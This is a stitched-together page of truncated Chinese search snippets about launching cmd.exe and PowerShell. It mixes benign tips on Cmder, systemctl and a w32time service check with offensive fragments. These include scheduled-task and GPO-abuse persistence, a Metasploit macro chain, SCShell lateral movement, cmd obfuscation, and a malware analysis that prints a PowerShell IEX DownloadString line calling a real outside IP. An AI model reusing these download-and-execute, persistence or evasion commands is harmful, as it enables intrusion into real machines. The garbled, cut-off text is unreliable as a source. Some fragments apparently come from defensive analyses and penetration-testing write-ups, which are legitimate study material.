有一些程序不支持被直接启动,而要求通过命令行启动。这个时候,你就需要使用 cmd.exe 来启动这样的程序。.../frpc.ini 关于为什么会用这种方式启动 frpc.exe,则是为了设置 frpc.exe 为开机自动启动。...你 可以用/V:ON 或 /V:OFF 开关,为 CMD.EXE 的某个调用而 启用或停用延迟环境变量扩展。...你可以用 /F:ON 或 /F:OFF 开关为 CMD.EXE 的某个 调用而启用或禁用文件名完成。...如果文件 完成被用于内置式目录命令(CD、MD 或 RD),就会使用目录 完成。 用引号将相符路径括起来,完成代码可以正确处理含有空格 或其他特殊字符的文件名。
需求:生成ANSI格式的.ps1,实现检查开机的时候windows time服务是否启动状态,不是的话启动它。...get-service w32time).status -ne 'Running'){start-service w32time -EA 0} powershell -command xxx 如果 Command 的值为脚本块...,则脚本块必须用括号({})括起来 如果是在cmd中,则还需要代码块加双引号,例如"代码块"或者"& ({代码块})" 同样的代码在cmd和powershell中可能有不一样的效果 这句命令在powershell...-ne 'Running'){start-service w32time -EA 0}})" 打算创建开机计划任务检查windows time服务是否Running状态,不是的话启动它 cmd.exe...,要特别注意,比如cmd.exe /c type nul>c:\w32time.ps1,本来用cmd.exe /c echo %date% %time%>c:\w32time.ps1创建的文件是ANSI
victim端打开此文档后启用宏之后,会执行相关的宏代码连接到Metasploit的客户端,使用shell命令可以可以获得一个命令行对应的windows系统此时应该会拉起一个cmd.exe ? ?...0x3 进程拉起顺序 在victim端口查看相关进程可以发现依次的启动顺序为:svchost.exe-> WmiPrvSE.exe -> powershell.exe ->powershell.exe...可以在第一个powershell.exe的启动参数找到痕迹 ?...第一个powershell.exe之后拉起第二个powershell.exe执行保存在payload.txt里面的恶意代码,会设置自启动。 ?...之后在执行了shell命令执行,第二个powershell.exe会主动拉起一个cmd.exe 进行远程命令执行。
Options required to add a new user or computer startup script: --ScriptName 设置新启动脚本的名称...--ScriptContents 设置新启动脚本的内容。 --GPOName 存在安全漏洞的GPO名称。...--Command 需要执行的命令 --Arguments 传递给命令的参数。 --GPOName 存在安全漏洞的GPO名称。...--TargetUsername 目标用户,恶意任务只会针对特定用户运行,格式为 \。...--AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe
配置右键快捷启动: 以管理员身份打开cmd,执行以下命令即可,完了以后在任意地方点击右键即可使用cmder // 设置任意地方鼠标右键启动Cmder Cmder.exe /REGISTER ALL 鼠标右键启动...的一些常用快捷键 Tab 自动路径补全 Ctrl+T 建立新页签 Ctrl+W 关闭页签 Ctrl+Tab 切换页签 Alt+F4 关闭所有页签 Alt+Shift+1 开启cmd.exe...Alt+Shift+2 开启powershell.exe Alt+Shift+3 开启powershell.exe (系统管理员权限) Ctrl+1 快速切换到第1个页签 Ctrl+n...关闭页签 Ctrl+Tab 切换页签 Alt+F4 关闭所有页签 Alt+Shift+1 开启cmd.exe Alt+Shift+2 开启powershell.exe Alt...切换到全屏状态 Ctr+r 历史命令搜索 Win+Alt+P 开启工具选项视窗 五、关于中文乱码问题: 将下面的4行命令添加到cmder/config/aliases文件末尾,如果还是不行参考前面字体设置
因为要在Linux系统上装NVIDIA显卡驱动,默认重启必须是字符界面,因此把这块所需命令记录下来。...1,先查看当前系统默认启动的界面 systemctl get-default 2,修改默认启动界面为图形界面 systemctl set-default graphical.target 3,修改默认启动界面为字符...(命令行)界面 systemctl set-default multi-user.target
Payload既可以从磁盘上执行,也可以从远程位置下载执行,这些Payload可以是可执行文件、PowerShell脚本或者scriptlets形式。...“schtasks”命令可以创建一个计划任务。...例如使用下面的命令就可以指定在每次系统登录时,操作系统会自动去下载并执行一个基于PowerShell的Payload。...图*-* 通过计划任务建立的Meterperter 也可以指定Payload在系统启动期间或系统空闲时执行。...如果用户具有管理员级别的权限,就可以使用以下命令来创建一个新的计划任务,该任务将会在系统登录时执行。
2.在安装目录下,打到exe,右键属性,设置为以管理员启动。 3.(此步骤为开启UAC的系统使用)编译:PowerShellAgent.exe。(如果已经有了,不用再次编译。) ...而powershell.exe和cmd.exe等进程是OS自带的,不能设置默认以管理员运行。所以这里创建一个新的exe,代理到powershell.exe。然后再设置此程序默认以管理员运行即可。...(此步骤为开启UAC的系统使用)找到PowerShellAgent.exe,右键属性,设置为以管理员启动。 5....(此步骤为开启UAC的系统使用)以管理员身份运行cmd命令关联默认的.ps1文件程序为PowerShellAgent.exe。...(此步骤为未开启UAC的系统使用)运行cmd命令关联默认的.ps1文件程序为PowerShell.exe。
有效负载可以从磁盘或远程位置执行,它们可以是可执行文件、powershell脚本或scriptlet的形式。...Meterpreter – 持久性计划任务 也可以在系统启动期间或用户会话处于非活动状态(空闲模式)时执行。...持续性–计划任务日期和时间 如果为目标事件启用了事件日志记录,则可以在特定的Windows事件中触发任务。b33f在他的网站上演示了此技术。Windows事件命令行实用程序可用于查询事件ID。...通过检查名称和提供的参数,此功能可用于验证调度任务命令。...此命令可用于主机的态势感知期间,并确定是否存在可以修改以运行有效负载而不是创建新任务的现有计划任务。
.exe c:\windows\debug\item.dat,ServiceMain aaaa | 系统启动执行 | | Mysa2 | cmd.exe /c echo open ftp.ftp0930...C:/Windows/Temp临时文件目录,被注入的病毒代码执行恶意逻辑主要参照从C&C服务器请求到的配置文件,该文件释放到本地后路径为:%SystemRoot%\Temp\ntuser.dat。...:C:\Windows\Temp\conhost.exe 路径:C:\Windows\SysWOW64\cmd.exe命令行:cmd /c ""C:\windows...\System32\cmd.exe命令行:"C:\Windows\System32\cmd.exe" /C ping 127.0.0.1 -n 6 & taskkill -f /im lsmose.exe...命令行:powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt
创建计划任务可以本地或者远程操作,也可以作为远程执行命令的一种方式,老版本的 Windows 系统可以用 at 命令创建,新系统内逐渐替换为 schtask 命令。...SharPersist 也可以检查任务是否执行成功的功能: SharPersist.exe -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c C:\tmp...使用 schtaskbackdoor 和 check 功能结合,可以识别指定的计划任务是否为后门: SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32...\cmd.exe" -a "/c C:\tmp\pentestlab.exe" -n "PentestLab" -m check ?...使用 add 参数可以执行恶意命令的现有计划任务: SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c
Cmder完全代替cmd操作,我们需要设置系统环境变量: 配置系统环境变量 打开“系统环境变量”,在用户变量栏的“Path”中添加Cmder的目录 image.png Win+R运行Cmder: 配置右键启动...自动路径补全 Ctrl+T 建立新页签 Ctrl+W 关闭页签 Ctrl+Tab 切换页签 Alt+F4 关闭所有页签 Alt+Shift+1 开启cmd.exe...Alt+Shift+2 开启powershell.exe Alt+Shift+3 开启powershell.exe (系统管理员权限) Ctrl+1 快速切换到第1个页签 Ctrl+n...关闭页签 Ctrl+Tab 切换页签 Alt+F4 关闭所有页签 Alt+Shift+1 开启cmd.exe Alt+Shift+2 开启powershell.exe Alt...+Shift+3 开启powershell.exe (系统管理员权限) Ctrl+1 快速切换到第1个页签 Ctrl+n 快速切换到第n个页签( n值无上限) Alt + enter
常用来混淆命令的特殊字符主要有以下四种: 1.字符“^”是CMD命令中最常见的转义字符,该字符不影响命令的执行。...如果需要把它们作为字符输出的话,就需要对这些特殊字符做转义处理:在每个特殊字符前加上转义字符^。举个例子:echo ^>、echo ^|、echo ^|^|、echo ^^ 和c^m^d。 ?...offset 默认下标从0开始,offset也支持负数,表示反向遍历字符串的下标。举个例子:通过%comspec%截取出cmd.exe。 ?...assoc:文件名扩展关联命令,用于显示和设置文件名扩展关联,可以指定某种后缀名的文件按照特定的类型文件打开或执行。命令格式为: assoc [.ext[=[fileType]]] ?...命令格式为: ftype [fileType[=[openCommandString]] ?
一旦进程获取了正确的身份验证,即可使用OpenSCManagerA远程打开目标主机上Service Manager ? 使用OpenServiceA API打开远程服务并抛出错误 ?...那么上面的代码就是调用ChangeServiceConfigA来将二进制路径名设置为我们提供的有效负载(就是执行我们的lpBinaryPathName中的值,) 可利用点就是在这个位置,原理不难理解,就是...例如调用powershell来远程加载木马或执行命令等等。 最后就是通过StartServiceA启动服务。 ? 代码不难理解。...shell scshell.exe 10.10.10.10 defragsvc "C:\windows\system32\cmd.exe /c powershell.exe IEX(New-Object...从原理出发,举一反三就好 5.日志痕迹 使用用户凭证连接会在目标日志系统留下用户名、来访机器IP和服务超时等信息 ? ?
注册为系统Systemctl 启动项 创建一个文件 XXX.service 注意XXX是代表未来命令名字哦 [Unit] Description=服务的描述 After=network.target...指定程序的启动方式,User 指定程序运行的用户,ExecStart 指定程序的启动命令,WantedBy 指定服务启动的级别。...systemctl enable 服务名 sudo systemctl disable 服务名 示例 注册为系统Systemctl 启动项 /usr/local/bin/ 注册服务器的命令 我们都知道可执行文件.../就能启动了。 每次启动时,但是还是得要找到文件的位置,比较麻烦的。...你看我们输入gi,按下tab获取提示的时候,已经有giao命令了。哈哈
的exe后,直接执行Teamserver.exe即可启动teamserver 启动/管理监听器 要启动新的侦听器,请使用StartListener命令。...此命令有两个参数:侦听器名称和要运行的端口 该Listeners命令列出所有侦听器,ViewListener返回指定侦听器的数据,RemoveListener并可用于从列表中删除侦听器 与主机连接...PSShell打开一个新的运行空间并执行命令,因此即使powershell.exe被列入黑名单,PowerShell 命令仍然可以执行。此方法还绕过约束语言模式。...CMDShell打开一个cmd.exe进程并将命令传递给进程。上面显示了执行 PowerShell 命令,因此这里也不会显示。...关于 的旁注CMDShell,许多执行的常见命令包括(但不限于)whoami、ipconfig、pwd 和 cd 已被实现到植入功能中,以避免需要通过cmd.exe进程执行此类命令。
在使用 TotalCommnader 可以设置工具的快捷图标,可以用来启动一些工具。...此时通过开始菜单,搜寻 Developer Command Prompt 右击打开所在文件夹,可以找到快捷方式 右击快捷方式找到启动项 %comspec% /k "C:\Program Files (x86...Enterprise\Common7\Tools\VsDevCmd.bat" 我是使用 VisualStudio 2019 企业版,如果是其他的版本,那么上面的代码和我不相同 这里的 %comspec% 的意思就是 cmd.exe...\WindowsPowerShell\v1.0\powershell.exe -noe -c "&{Import-Module """C:\Program Files (x86)\Microsoft Visual...注意我使用 VisualStudio 2019 企业版,如果是其他的版本,那么上面的代码和我不相同 将上面代码的 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1.4从攻击者的HTTP服务器下载文件:cmd.exe 借助 PowerShell 示例,我们可以使用一种技术,它允许我们从 cmd.exe 提示符执行 PowerShell 命令。...要从 cmd.exe 提示符执行 PowerShell 命令,请使用“ powershell.exe -c ”启动该命令,后跟要执行的 PowerShell 命令,并用双引号引起来。...例如,如果我们在 cmd.exe 提示符下立足,并且就地 PowerShell 升级正在终止我们的 shell,我们可以再次使用 Nishang 的脚本,但这次附加“ powershell.exe -c...PowerShell 命令前面添加powershell -c并将其用双引号引起来,我们可以从 cmd.exe 提示符执行它: powershell.exe -c "(New-Object System.Net.WebClient...为 PS1 脚本和二进制文件 (EXE) 设置目录允许我们将它们从攻击者计算机直接执行到受害者的内存中。最重要的是,这是不需要下载文件或将文件传输给受害者来完成的。
【本文内容过旧】 使用Symantec Ghost Solution Suite 2.5 建立了自启动 Bootable CD/USB 但是不知道为什么命令执行不了。...于是我建立了新的bat来辅助执行 首先,进入GHOST文件夹,并复制电脑的cmd.exe和PowerShell整个文件夹到GHOST....powershell echo Press 3 to start ghost32 echo Press 4 to Exit set /p ops= echo if %ops% == 1 (start cmd.exe...) else if %ops% == 2 (start Pshell\powershell.exe ) else if %ops% == 3 (start ghost32.exe ) else
下图显示的是我们使用FIN8宏解码器从恶意宏 “COMPLAINTHomer Glynn.doc” 中提取出来的FIN8环境变量命令。 ?...因此,WinWord.exe将不会生成子进程,但系统将会生成如下进程树:wmiprvse.exe > cmd.exe > powershell.exe。...最后,他们还使用了一个cmd.exe支持的字符替换功能,而这个功能几乎很少有人知道。wscript.exe命令也被设置在了一个进程级环境变量“x”之中,但使用了字符“@”来进行混淆处理。...在这个样本中,FIN7使用了FIN8通过StdIn传递命令的技术,但这一次FIN7并没有将命令发送给powershell.exe,而是发送给了cmd.exe,不过两种方式的逃逸效果是一样的。...这种技术会暴露前三个cmd.exe的命令执行参数,如果这些环境变量设置在LNK或宏文件中并通过StdIn传递到了cmd.exe之中,那么命令行界面将不会出现任何数据。
领取专属 10元无门槛券
手把手带您无忧上云